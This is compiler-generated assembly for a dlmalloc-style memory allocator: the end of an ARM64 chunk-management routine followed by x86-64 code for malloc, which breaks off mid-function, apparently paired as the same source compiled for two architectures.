ldur x8, [x29, #-192]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #48] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_94
b LBB42_93
LBB42_93:
ldur x8, [x29, #-192]
ldr x8, [x8, #24]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #48] ; 4-byte Folded Spill
b LBB42_94
LBB42_94:
ldr w8, [sp, #48] ; 4-byte Folded Reload
str w8, [sp, #52] ; 4-byte Folded Spill
b LBB42_95
LBB42_95:
ldr w8, [sp, #52] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_107
b LBB42_96
LBB42_96:
ldur x8, [x29, #-200]
ldur x9, [x29, #-192]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_98
b LBB42_97
LBB42_97:
ldur w9, [x29, #-204]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9]
bic w8, w8, w10
str w8, [x9]
b LBB42_106
LBB42_98:
ldur x8, [x29, #-200]
ldur x9, [x29, #-24]
add x9, x9, #72
ldur w10, [x29, #-204]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #44] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_102
b LBB42_99
LBB42_99:
ldur x8, [x29, #-200]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #40] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_101
b LBB42_100
LBB42_100:
ldur x8, [x29, #-200]
ldr x8, [x8, #16]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #40] ; 4-byte Folded Spill
b LBB42_101
LBB42_101:
ldr w8, [sp, #40] ; 4-byte Folded Reload
str w8, [sp, #44] ; 4-byte Folded Spill
b LBB42_102
LBB42_102:
ldr w8, [sp, #44] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_104
b LBB42_103
LBB42_103:
ldur x8, [x29, #-200]
ldur x9, [x29, #-192]
str x8, [x9, #24]
ldur x8, [x29, #-192]
ldur x9, [x29, #-200]
str x8, [x9, #16]
b LBB42_105
LBB42_104:
bl _abort
LBB42_105:
b LBB42_106
LBB42_106:
b LBB42_108
LBB42_107:
bl _abort
LBB42_108:
b LBB42_158
LBB42_109:
ldur x8, [x29, #-48]
stur x8, [x29, #-216]
ldur x8, [x29, #-216]
ldr x8, [x8, #48]
stur x8, [x29, #-224]
ldur x8, [x29, #-216]
ldr x8, [x8, #24]
ldur x9, [x29, #-216]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB42_117
b LBB42_110
LBB42_110:
ldur x8, [x29, #-216]
ldr x8, [x8, #16]
str x8, [sp, #224]
ldur x8, [x29, #-216]
ldr x8, [x8, #24]
str x8, [sp, #232]
ldr x8, [sp, #224]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_113
b LBB42_111
LBB42_111:
ldr x8, [sp, #224]
ldr x8, [x8, #24]
ldur x9, [x29, #-216]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_113
b LBB42_112
LBB42_112:
ldr x8, [sp, #232]
ldr x8, [x8, #16]
ldur x9, [x29, #-216]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB42_113
LBB42_113:
ldr w8, [sp, #36] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_115
b LBB42_114
LBB42_114:
ldr x8, [sp, #232]
ldr x9, [sp, #224]
str x8, [x9, #24]
ldr x8, [sp, #224]
ldr x9, [sp, #232]
str x8, [x9, #16]
b LBB42_116
LBB42_115:
bl _abort
LBB42_116:
b LBB42_129
LBB42_117:
ldur x8, [x29, #-216]
add x9, x8, #40
str x9, [sp, #216]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #232]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB42_119
b LBB42_118
LBB42_118:
ldur x8, [x29, #-216]
add x9, x8, #32
str x9, [sp, #216]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #232]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_128
b LBB42_119
LBB42_119:
b LBB42_120
LBB42_120: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #232]
add x9, x8, #40
str x9, [sp, #208]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_122
b LBB42_121
LBB42_121: ; in Loop: Header=BB42_120 Depth=1
ldr x8, [sp, #232]
add x9, x8, #32
str x9, [sp, #208]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB42_122
LBB42_122: ; in Loop: Header=BB42_120 Depth=1
ldr w8, [sp, #32] ; 4-byte Folded Reload
tbz w8, #0, LBB42_124
b LBB42_123
LBB42_123: ; in Loop: Header=BB42_120 Depth=1
ldr x8, [sp, #208]
mov x9, x8
str x9, [sp, #216]
ldr x8, [x8]
str x8, [sp, #232]
b LBB42_120
LBB42_124:
ldr x8, [sp, #216]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_126
b LBB42_125
LBB42_125:
ldr x8, [sp, #216]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB42_127
LBB42_126:
bl _abort
LBB42_127:
b LBB42_128
LBB42_128:
b LBB42_129
LBB42_129:
ldur x8, [x29, #-224]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_157
b LBB42_130
LBB42_130:
ldur x8, [x29, #-24]
add x8, x8, #600
ldur x9, [x29, #-216]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #200]
ldur x8, [x29, #-216]
ldr x9, [sp, #200]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_134
b LBB42_131
LBB42_131:
ldr x8, [sp, #232]
ldr x10, [sp, #200]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB42_133
b LBB42_132
LBB42_132:
ldur x8, [x29, #-216]
ldr w9, [x8, #56]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB42_133
LBB42_133:
b LBB42_141
LBB42_134:
ldur x8, [x29, #-224]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_139
b LBB42_135
LBB42_135:
ldur x8, [x29, #-224]
ldr x8, [x8, #32]
ldur x9, [x29, #-216]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_137
b LBB42_136
LBB42_136:
ldr x8, [sp, #232]
ldur x9, [x29, #-224]
str x8, [x9, #32]
b LBB42_138
LBB42_137:
ldr x8, [sp, #232]
ldur x9, [x29, #-224]
str x8, [x9, #40]
b LBB42_138
LBB42_138:
b LBB42_140
LBB42_139:
bl _abort
LBB42_140:
b LBB42_141
LBB42_141:
ldr x8, [sp, #232]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_156
b LBB42_142
LBB42_142:
ldr x8, [sp, #232]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_154
b LBB42_143
LBB42_143:
ldur x8, [x29, #-224]
ldr x9, [sp, #232]
str x8, [x9, #48]
ldur x8, [x29, #-216]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #192]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_148
b LBB42_144
LBB42_144:
ldr x8, [sp, #192]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_146
b LBB42_145
LBB42_145:
ldr x8, [sp, #192]
ldr x9, [sp, #232]
str x8, [x9, #32]
ldr x8, [sp, #232]
ldr x9, [sp, #192]
str x8, [x9, #48]
b LBB42_147
LBB42_146:
bl _abort
LBB42_147:
b LBB42_148
LBB42_148:
ldur x8, [x29, #-216]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #184]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_153
b LBB42_149
LBB42_149:
ldr x8, [sp, #184]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_151
b LBB42_150
LBB42_150:
ldr x8, [sp, #184]
ldr x9, [sp, #232]
str x8, [x9, #40]
ldr x8, [sp, #232]
ldr x9, [sp, #184]
str x8, [x9, #48]
b LBB42_152
LBB42_151:
bl _abort
LBB42_152:
b LBB42_153
LBB42_153:
b LBB42_155
LBB42_154:
bl _abort
LBB42_155:
b LBB42_156
LBB42_156:
b LBB42_157
LBB42_157:
b LBB42_158
LBB42_158:
ldur x8, [x29, #-40]
orr x8, x8, #0x1
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-40]
ldur x9, [x29, #-32]
ldur x10, [x29, #-40]
str x8, [x9, x10]
ldur x8, [x29, #-32]
ldur x9, [x29, #-24]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_160
b LBB42_159
LBB42_159:
ldur x8, [x29, #-40]
ldur x9, [x29, #-24]
str x8, [x9, #8]
b LBB42_201
LBB42_160:
b LBB42_161
LBB42_161:
b LBB42_162
LBB42_162:
b LBB42_164
LBB42_163:
ldur x9, [x29, #-48]
ldr x8, [x9, #8]
and x8, x8, #0xfffffffffffffffe
str x8, [x9, #8]
ldur x8, [x29, #-40]
orr x8, x8, #0x1
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-40]
ldur x9, [x29, #-32]
ldur x10, [x29, #-40]
str x8, [x9, x10]
b LBB42_164
LBB42_164:
ldur x8, [x29, #-40]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB42_172
b LBB42_165
LBB42_165:
ldur x8, [x29, #-40]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #180]
ldur x8, [x29, #-24]
add x8, x8, #72
ldr w9, [sp, #180]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
str x8, [sp, #168]
ldr x8, [sp, #168]
str x8, [sp, #160]
ldur x8, [x29, #-24]
ldr w8, [x8]
ldr w10, [sp, #180]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB42_167
b LBB42_166
LBB42_166:
ldr w9, [sp, #180]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9]
orr w8, w8, w10
str w8, [x9]
b LBB42_171
LBB42_167:
ldr x8, [sp, #168]
ldr x8, [x8, #16]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_169
b LBB42_168
LBB42_168:
ldr x8, [sp, #168]
ldr x8, [x8, #16]
str x8, [sp, #160]
b LBB42_170
LBB42_169:
bl _abort
LBB42_170:
b LBB42_171
LBB42_171:
ldur x8, [x29, #-32]
ldr x9, [sp, #168]
str x8, [x9, #16]
ldur x8, [x29, #-32]
ldr x9, [sp, #160]
str x8, [x9, #24]
ldr x8, [sp, #160]
ldur x9, [x29, #-32]
str x8, [x9, #16]
ldr x8, [sp, #168]
ldur x9, [x29, #-32]
str x8, [x9, #24]
b LBB42_199
LBB42_172:
ldur x8, [x29, #-32]
str x8, [sp, #152]
ldur x8, [x29, #-40]
lsr x8, x8, #8
str x8, [sp, #128]
ldr x8, [sp, #128]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB42_174
b LBB42_173
LBB42_173:
str wzr, [sp, #140]
b LBB42_178
LBB42_174:
ldr x8, [sp, #128]
subs x8, x8, #16, lsl #12 ; =65536
cset w8, lo
tbnz w8, #0, LBB42_176
b LBB42_175
LBB42_175:
mov w8, #31
str w8, [sp, #140]
b LBB42_177
LBB42_176:
ldr x8, [sp, #128]
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #124]
ldr w8, [sp, #124]
subs w8, w8, #256
lsr w8, w8, #16
and w8, w8, #0x8
str w8, [sp, #120]
ldr w9, [sp, #120]
ldr w8, [sp, #124]
lsl w8, w8, w9
str w8, [sp, #124]
subs w8, w8, #1, lsl #12 ; =4096
lsr w8, w8, #16
and w8, w8, #0x4
str w8, [sp, #116]
ldr w9, [sp, #116]
ldr w8, [sp, #120]
add w8, w8, w9
str w8, [sp, #120]
ldr w9, [sp, #116]
ldr w8, [sp, #124]
lsl w8, w8, w9
str w8, [sp, #124]
subs w8, w8, #4, lsl #12 ; =16384
lsr w8, w8, #16
and w9, w8, #0x2
str w9, [sp, #116]
ldr w8, [sp, #120]
add w8, w8, w9
str w8, [sp, #120]
ldr w9, [sp, #120]
mov w8, #14
subs w8, w8, w9
ldr w10, [sp, #116]
ldr w9, [sp, #124]
lsl w9, w9, w10
str w9, [sp, #124]
add w8, w8, w9, lsr #15
str w8, [sp, #116]
ldr w8, [sp, #116]
lsl w8, w8, #1
; kill: def $x8 killed $w8
ldur x9, [x29, #-40]
ldr w10, [sp, #116]
add w10, w10, #7
; kill: def $x10 killed $w10
lsr x9, x9, x10
and x9, x9, #0x1
add x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #140]
b LBB42_177
LBB42_177:
b LBB42_178
LBB42_178:
ldur x8, [x29, #-24]
add x8, x8, #600
ldr w9, [sp, #140]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #144]
ldr w8, [sp, #140]
ldr x9, [sp, #152]
str w8, [x9, #56]
ldr x8, [sp, #152]
; kill: def $x9 killed $xzr
str xzr, [x8, #40]
ldr x8, [sp, #152]
str xzr, [x8, #32]
ldur x8, [x29, #-24]
ldr w8, [x8, #4]
ldr w10, [sp, #140]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB42_180
b LBB42_179
LBB42_179:
ldr w9, [sp, #140]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
orr w8, w8, w10
str w8, [x9, #4]
ldr x8, [sp, #152]
ldr x9, [sp, #144]
str x8, [x9]
ldr x8, [sp, #144]
ldr x9, [sp, #152]
str x8, [x9, #48]
ldr x8, [sp, #152]
ldr x9, [sp, #152]
str x8, [x9, #24]
ldr x9, [sp, #152]
str x8, [x9, #16]
b LBB42_198
LBB42_180:
ldr x8, [sp, #144]
ldr x8, [x8]
str x8, [sp, #104]
ldur x8, [x29, #-40]
str x8, [sp, #24] ; 8-byte Folded Spill
ldr w8, [sp, #140]
subs w8, w8, #31
cset w8, ne
tbnz w8, #0, LBB42_182
b LBB42_181
LBB42_181:
mov x8, #0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB42_183
LBB42_182:
ldr w8, [sp, #140]
lsr w8, w8, #1
add w8, w8, #8
subs w8, w8, #2
mov x9, x8
mov x8, #63
subs x8, x8, x9
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB42_183
LBB42_183:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x9, [sp, #16] ; 8-byte Folded Reload
lsl x8, x8, x9
str x8, [sp, #96]
b LBB42_184
LBB42_184: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #104]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB42_191
b LBB42_185
LBB42_185: ; in Loop: Header=BB42_184 Depth=1
ldr x8, [sp, #104]
add x8, x8, #32
ldr x9, [sp, #96]
lsr x9, x9, #63
and x9, x9, #0x1
add x8, x8, x9, lsl #3
str x8, [sp, #88]
ldr x8, [sp, #96]
lsl x8, x8, #1
str x8, [sp, #96]
ldr x8, [sp, #88]
ldr x8, [x8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_187
b LBB42_186
LBB42_186: ; in Loop: Header=BB42_184 Depth=1
ldr x8, [sp, #88]
ldr x8, [x8]
str x8, [sp, #104]
b LBB42_190
LBB42_187:
ldr x8, [sp, #88]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_189
b LBB42_188
LBB42_188:
ldr x8, [sp, #152]
ldr x9, [sp, #88]
str x8, [x9]
ldr x8, [sp, #104]
ldr x9, [sp, #152]
str x8, [x9, #48]
ldr x8, [sp, #152]
ldr x9, [sp, #152]
str x8, [x9, #24]
ldr x9, [sp, #152]
str x8, [x9, #16]
b LBB42_197
LBB42_189:
bl _abort
LBB42_190: ; in Loop: Header=BB42_184 Depth=1
b LBB42_196
LBB42_191:
ldr x8, [sp, #104]
ldr x8, [x8, #16]
str x8, [sp, #80]
ldr x8, [sp, #104]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_193
b LBB42_192
LBB42_192:
ldr x8, [sp, #80]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB42_193
LBB42_193:
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_195
b LBB42_194
LBB42_194:
ldr x8, [sp, #152]
ldr x9, [sp, #80]
str x8, [x9, #24]
ldr x9, [sp, #104]
str x8, [x9, #16]
ldr x8, [sp, #80]
ldr x9, [sp, #152]
str x8, [x9, #16]
ldr x8, [sp, #104]
ldr x9, [sp, #152]
str x8, [x9, #24]
ldr x8, [sp, #152]
; kill: def $x9 killed $xzr
str xzr, [x8, #48]
b LBB42_197
LBB42_195:
bl _abort
LBB42_196: ; in Loop: Header=BB42_184 Depth=1
b LBB42_184
LBB42_197:
b LBB42_198
LBB42_198:
b LBB42_199
LBB42_199:
b LBB42_201
LBB42_200:
bl _abort
LBB42_201:
ldp x29, x30, [sp, #464] ; 16-byte Folded Reload
ldp x28, x27, [sp, #448] ; 16-byte Folded Reload
add sp, sp, #480
ret
.cfi_endproc
; -- End function
.zerofill __DATA,__bss,__gm_,936,3 ; @_gm_
.zerofill __DATA,__bss,_mparams,48,3 ; @mparams
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "max system bytes = %10lu\n"
l_.str.1: ; @.str.1
.asciz "system bytes = %10lu\n"
l_.str.2: ; @.str.2
.asciz "in use bytes = %10lu\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _malloc ## -- Begin function malloc
.p2align 4, 0x90
_malloc: ## @malloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $240, %rsp
movq %rdi, -8(%rbp)
cmpq $232, -8(%rbp)
ja LBB0_43
## %bb.1:
cmpq $23, -8(%rbp)
jae LBB0_3
## %bb.2:
movl $32, %eax
movq %rax, -216(%rbp) ## 8-byte Spill
jmp LBB0_4
LBB0_3:
movq -8(%rbp), %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -216(%rbp) ## 8-byte Spill
LBB0_4:
movq -216(%rbp), %rax ## 8-byte Reload
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -28(%rbp)
movl __gm_(%rip), %eax
movl -28(%rbp), %ecx
## kill: def $cl killed $ecx
shrl %cl, %eax
movl %eax, -32(%rbp)
movl -32(%rbp), %eax
andl $3, %eax
cmpl $0, %eax
je LBB0_14
## %bb.5:
movl -32(%rbp), %eax
xorl $-1, %eax
andl $1, %eax
addl -28(%rbp), %eax
movl %eax, -28(%rbp)
movl -28(%rbp), %eax
shll $1, %eax
movl %eax, %eax
movl %eax, %ecx
leaq __gm_(%rip), %rax
addq $72, %rax
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -40(%rbp)
movq -40(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -56(%rbp)
movq -40(%rbp), %rax
cmpq -56(%rbp), %rax
jne LBB0_7
## %bb.6:
movl -28(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
xorl $-1, %eax
andl __gm_(%rip), %eax
movl %eax, __gm_(%rip)
jmp LBB0_13
LBB0_7:
movq -56(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -217(%rbp) ## 1-byte Spill
jb LBB0_9
## %bb.8:
movq -56(%rbp), %rax
movq 24(%rax), %rax
cmpq -48(%rbp), %rax
sete %al
movb %al, -217(%rbp) ## 1-byte Spill
LBB0_9:
movb -217(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_11
## %bb.10:
movq -40(%rbp), %rcx
movq -56(%rbp), %rax
movq %rcx, 24(%rax)
movq -56(%rbp), %rcx
movq -40(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB0_12
LBB0_11:
callq _abort
LBB0_12:
jmp LBB0_13
LBB0_13:
movl -28(%rbp), %eax
shll $3, %eax
movl %eax, %eax
movl %eax, %ecx
orq $1, %rcx
orq $2, %rcx
movq -48(%rbp), %rax
movq %rcx, 8(%rax)
movq -48(%rbp), %rax
movl -28(%rbp), %ecx
shll $3, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -48(%rbp), %rax
addq $16, %rax
movq %rax, -16(%rbp)
jmp LBB0_59
LBB0_14:
movq -24(%rbp), %rax
cmpq __gm_+8(%rip), %rax
jbe LBB0_41
## %bb.15:
cmpl $0, -32(%rbp)
je LBB0_36
## %bb.16:
movl -32(%rbp), %eax
movl -28(%rbp), %ecx
## kill: def $cl killed $ecx
shll %cl, %eax
movl -28(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
shll $1, %ecx
movl %ecx, -224(%rbp) ## 4-byte Spill
movl -28(%rbp), %ecx
movl $1, %esi
## kill: def $cl killed $ecx
shll %cl, %esi
movl -224(%rbp), %ecx ## 4-byte Reload
shll $1, %esi
xorl %edx, %edx
subl %esi, %edx
orl %edx, %ecx
andl %ecx, %eax
movl %eax, -96(%rbp)
movl -96(%rbp), %eax
xorl %ecx, %ecx
subl -96(%rbp), %ecx
andl %ecx, %eax
movl %eax, -100(%rbp)
movl -100(%rbp), %eax
bsfl %eax, %eax
movl %eax, -104(%rbp)
movl -104(%rbp), %eax
movl %eax, -92(%rbp)
movl -92(%rbp), %eax
shll $1, %eax
movl %eax, %eax
movl %eax, %ecx
leaq __gm_(%rip), %rax
addq $72, %rax
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -64(%rbp)
movq -64(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -72(%rbp)
movq -72(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -112(%rbp)
movq -64(%rbp), %rax
cmpq -112(%rbp), %rax
jne LBB0_18
## %bb.17:
movl -92(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
xorl $-1, %eax
andl __gm_(%rip), %eax
movl %eax, __gm_(%rip)
jmp LBB0_24
LBB0_18:
movq -112(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq __gm_+24(%rip), %rcx
movb %al, -225(%rbp) ## 1-byte Spill
jb LBB0_20
## %bb.19:
movq -112(%rbp), %rax
movq 24(%rax), %rax
cmpq -72(%rbp), %rax
sete %al
movb %al, -225(%rbp) ## 1-byte Spill
LBB0_20:
movb -225(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_22
## %bb.21:
movq -64(%rbp), %rcx
movq -112(%rbp), %rax
movq %rcx, 24(%rax)
movq -112(%rbp), %rcx
movq -64(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB0_23
LBB0_22:
callq _abort
LBB0_23:
jmp LBB0_24
LBB0_24:
movl -92(%rbp), %eax
shll $3, %eax
movl %eax, %eax
## kill: def $rax killed $eax
subq -24(%rbp), %rax
movq %rax, -88(%rbp)
cmpq $32, -88(%rbp)
jae LBB0_26
## %bb.25:
movl -92(%rbp), %eax
shll $3, %eax
movl %eax, %eax
movl %eax, %ecx
orq $1, %rcx
orq $2, %rcx
movq -72(%rbp), %rax
movq %rcx, 8(%rax)
movq -72(%rbp), %rax
movl -92(%rbp), %ecx
shll $3, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
jmp LBB0_35
LBB0_26:
movq -24(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -72(%rbp), %rax
movq %rcx, 8(%rax)
movq -72(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -80(%rbp)
movq -88(%rbp), %rcx
orq $1, %rcx
movq -80(%rbp), %rax
movq %rcx, 8(%rax)
movq -88(%rbp), %rdx
movq -80(%rbp), %rax
movq -88(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq __gm_+8(%rip), %rax
movq %rax, -120(%rbp)
cmpq $0, -120(%rbp)
je LBB0_34
## %bb.27:
movq __gm_+32(%rip), %rax
movq %rax, -128(%rbp)
movq -120(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -132(%rbp)
movl -132(%rbp), %eax
shll $1, %eax
movl %eax, %eax
movl %eax, %ecx
leaq __gm_(%rip), %rax
addq $72, %rax
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -144(%rbp)
movq -144(%rbp), %rax
movq %rax, -152(%rbp)
movl __gm_(%rip), %eax
movl -132(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB0_29
## %bb.28:
movl -132(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
orl __gm_(%rip), %eax
movl %eax, __gm_(%rip)
jmp LBB0_33
LBB0_29:
movq -144(%rbp), %rax
movq 16(%rax), %rax
cmpq __gm_+24(%rip), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB0_31
## %bb.30:
movq -144(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -152(%rbp)
jmp LBB0_32
LBB0_31:
callq _abort
LBB0_32:
jmp LBB0_33
LBB0_33:
movq -128(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 16(%rax)
movq -128(%rbp), %rcx
movq -152(%rbp), %rax
movq %rcx, 24(%rax)
movq -152(%rbp), %rcx
movq -128(%rbp), %rax
movq %rcx, 16(%rax)
movq -144(%rbp), %rcx
movq -128(%rbp), %rax
movq %rcx, 24(%rax)
LBB0_34:
movq -88(%rbp), %rax
movq %rax, __gm_+8(%rip)
movq -80(%rbp), %rax
movq %rax, __gm_+32(%rip)
LBB0_35:
movq -72(%rbp), %rax
addq $16, %rax
movq %rax, -16(%rbp)
jmp LBB0_59
LBB0_36:
cmpl $0, __gm_+4(%rip)
je LBB0_39
## %bb.37:
movq -24(%rbp), %rsi
leaq __gm_(%rip), %rdi
callq _tmalloc_small
movq %rax, -16(%rbp)
cmpq $0, %rax
je LBB0_39
## %bb.38:
jmp LBB0_59
LBB0_39:
jmp LBB0_40
LBB0_40:
jmp LBB0_41
LBB0_41:
jmp LBB0_42
LBB0_42:
jmp LBB0_50
LBB0_43:
cmpq $-128, -8(%rbp)
jb LBB0_45
## %bb.44:
movq $-1, -24(%rbp)
jmp LBB0_49
LBB0_45:
movq -8(%rbp), %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -24(%rbp)
cmpl $0, __gm_+4(%rip)
je LBB0_48
## %bb.46:
movq -24(%rbp), %rsi
leaq __gm_(%rip), %rdi
